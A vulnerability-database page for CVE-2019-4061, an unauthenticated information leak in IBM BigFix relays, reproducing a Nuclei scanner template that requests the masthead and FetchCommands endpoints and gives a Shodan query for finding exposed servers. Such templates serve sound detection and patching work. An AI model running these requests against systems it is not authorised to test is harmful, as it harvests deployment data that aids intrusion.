CVE-2019-4061: IBM BigFix Platform - Information Disclosure

日期: 2025-12-12 | 影响软件: IBM BigFix Platform | POC: 已公开

漏洞描述

IBM BigFix Platform 9.2 and 9.5 contains an information disclosure vulnerability caused by not enabling authenticated access in relay, letting remote attackers query and gather update and fixlet information, exploit requires no authentication.

PoC代码[已公开]

id: CVE-2019-4061

info:
  name: IBM BigFix Platform - Information Disclosure
  author: daffainfo
  severity: medium
  description: |
    IBM BigFix Platform 9.2 and 9.5 contains an information disclosure vulnerability caused by not enabling authenticated access in relay, letting remote attackers query and gather update and fixlet information, exploit requires no authentication.
  impact: |
    Attackers can remotely gather sensitive update and fixlet deployment information, potentially aiding targeted attacks.
  remediation: |
    Enable authenticated access for relay to prevent unauthorized information queries.
  reference:
    - https://www.atredis.com/blog/2019/3/18/harvesting-data-from-bigfix-relay-servers
    - https://github.com/rapid7/metasploit-framework/blob/0fd8f0984e10a135c000d1fb8797d76d62fb24f7/modules/auxiliary/gather/ibm_bigfix_sites_packages_enum.rb
    - https://nvd.nist.gov/vuln/detail/CVE-2019-4061
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-4061
    epss-score: 0.72958
    epss-percentile: 0.98719
    cwe-id: CWE-200
    cpe: cpe:2.3:a:ibm:bigfix_platform:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ibm
    product: bigfix_platform
    shodan-query: port:52311 "BigFixHTTPServer"
  tags: cve,cve2019,ibm,bigfix,disclosure,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/masthead/masthead.axfm"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Organization: ", "-URL: ")'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "x-bes-command-hasiteversion:")'
        condition: and
# digest: 4a0a0047304502210081e822a156889d79159f5bedda964cfb84db60bb4b08f263e2ae95097cb7a57a02203adde0da88c5bf98e75dd3e299386ab1528deeddc6117781b9be488237017fd6:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2019/CVE-2019-4061.yaml

相关漏洞推荐